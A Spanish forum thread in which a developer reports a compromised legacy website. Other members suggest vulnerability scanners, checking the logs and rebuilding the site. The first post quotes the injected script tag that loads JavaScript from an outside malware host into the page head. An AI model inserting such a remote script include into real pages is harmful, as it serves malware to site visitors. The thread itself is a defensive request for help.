Problema seguridad

PiPePiTo #1 Ene '14

Hola que tal...

Resulta que hoy en el curro, en una página bastante antigua nos hemos encontrado con que Google la había marcado como que escupia Malware proveniente o vaya usté a saber de una página llamada artlo.de.

Pues bien, me he encontrado en el index.html este pedazo en el <head>

<script src="http://artlo.de/nuetecoi.php?id=46288253" type="text/javascript"></script>

La verdad es que yo no estoy muy metido en estos temas, y menos en ese proyecto que es una mezcla entre visual basic, javascript de hace 8 años y vómito de satanás...

¿Cómo cojones nos han colado eso?

Soltrac #2 Ene '14 MV Wizard

Q pasa crack.

Si no sabes ni por donde empezar, deberías pasar a tu página web un scanner de seguridad para los agujeros más típicos. Que conste, no es la panacea, pero a mi me ha ayudado en algún que otro momento.

Creo que hay alguno freeware, pero de pago yo conozco el de Acunetix (http://www.acunetix.com/)

Empieza por ahí.

1 respuesta

PiPePiTo #3 Ene '14

#2 Thx! Se lo diré al jefe a ver que me comenta x'D

A ver por donde le dan ahora...

Nucklear #4 Ene '14 BugHunter

Mira los logs, tiene que haber rastros de cuando entraron. También mira la fecha de modificación de ese archivo para grepear los logs por una fecha en concreto.

Si quieres herramientas gratuitas para búsqueda de vulnerabilidades mirate W3af o Vega no son tan completos como Acunetix pero son gratuitos. Tambien pasa un escaner como Nikto para escanear servicios porque puede que la vulnerabilidad esté en otro lado que no sea el interfaz web.

Por otra parte si os han editado un archivo es que los atacantes tienen control del server y probablemente os hayan dejado un backdoor así que mi consejo es que reconstruyáis el site desde cero para evitar sustos en el futuro.

1 respuesta

PiPePiTo #5 Ene '14

#4 Aprovechando esto voy a hacer una campaña de presión para tumbar el sitio, la verdad x'D y ver si usamos ya la nueva aplicación web...

Problema seguridad

Usuarios habituales

Tags